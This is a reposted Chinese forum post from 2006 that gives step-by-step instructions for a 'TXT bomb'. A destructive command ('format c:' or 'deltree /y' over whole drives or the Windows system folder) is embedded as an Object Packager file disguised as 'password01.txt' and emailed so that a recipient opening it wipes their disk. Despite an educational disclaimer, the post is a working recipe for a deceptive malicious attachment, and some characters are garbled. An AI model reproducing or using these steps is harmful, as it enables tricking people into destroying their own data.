[轉貼] TXT炸彈的製作方法
[鄭重聲明] 本文章本著研究駭客攻防技巧的精神 純粹為教學示範之用 不得用於任何惡意急不法行為 [鄭重聲明]
TXT炸彈的製作方法
1.新增一個只包含一個空格(為了減小文件體積)的文本文件,任意取名。
2.開啟{記事本文件},將此文件拖放入{記事本文件}。也可以點擊記{記事本文件}單欄中的「插入對像」,彈出「插入對像」對話視窗,選「從文件新增」,然後點擊「瀏覽」按鈕選項要插入的文件。
3.選該插入對象的圖示,選項弁鄋簂璊雲滿u編輯包對像編輯包」(如圖1)。在彈出的「對像包裝程序」對話視窗中,選項弁鄋簂璊雲滿u編輯指令行」,然後輸入如下指令:start.exe /m format c:/q /autotest /u ,點擊「確定」,此時,內容欄中會顯示出指令內容。
4.點擊外觀欄中的「插入圖示」按鈕,會彈出一個警告對話視窗,驗證,然後任選一個圖示。
5.選項弁鄋簂璊雲滿u編輯卷冊」,為此嵌入對像取一個名稱(會取代原來的檔案名稱)。點擊「文件」弁鄋矰雲滿u更新」,然後關閉此對話視窗。
6.將剛剛建立的嵌入對像拖放到桌面上。文件的預設名是「碎片」(在2000下的預設名為」片段」),現在我們把它改成「password01.txt」。開啟電子郵件程式將桌面上的「password01.txt」作為附件發出,或者將含有嵌入對像(帶有惡意指令)的文件作為附件發出。
7.當郵件接收者誤將「password01.txt.shs」文件作為「password01.txt」(如前文所述,「.SHS」副檔名永遠是隱藏的)放心地開啟時,或開啟文件,點擊文件中的嵌入對像時觸發惡意指令(彈出DOS執行視窗,執行格式化指令).如果將上面的指令取代為:start.exe /m deltree /y a:*.* c:*.* d:*.* 則是將移除對方硬碟下所有文件(磁碟代號根據實際情況自訂);如果取代為:start.exe /m deltree /y c:windowssystem*.* 則是移除對方c:windowssystem目錄底下的所有文件.(當然大家可以改成其它的指令)
真的很簡單,就這樣一個惡意的攻擊程序被弄出來了
[鄭重聲明] 本文章本著研究駭客攻防技巧的精神 純粹為教學示範之用 不得用於任何惡意急不法行為 [鄭重聲明]
[ 本帖最後由 philxyz0316 於 2006-9-13 22:23 編輯 ]
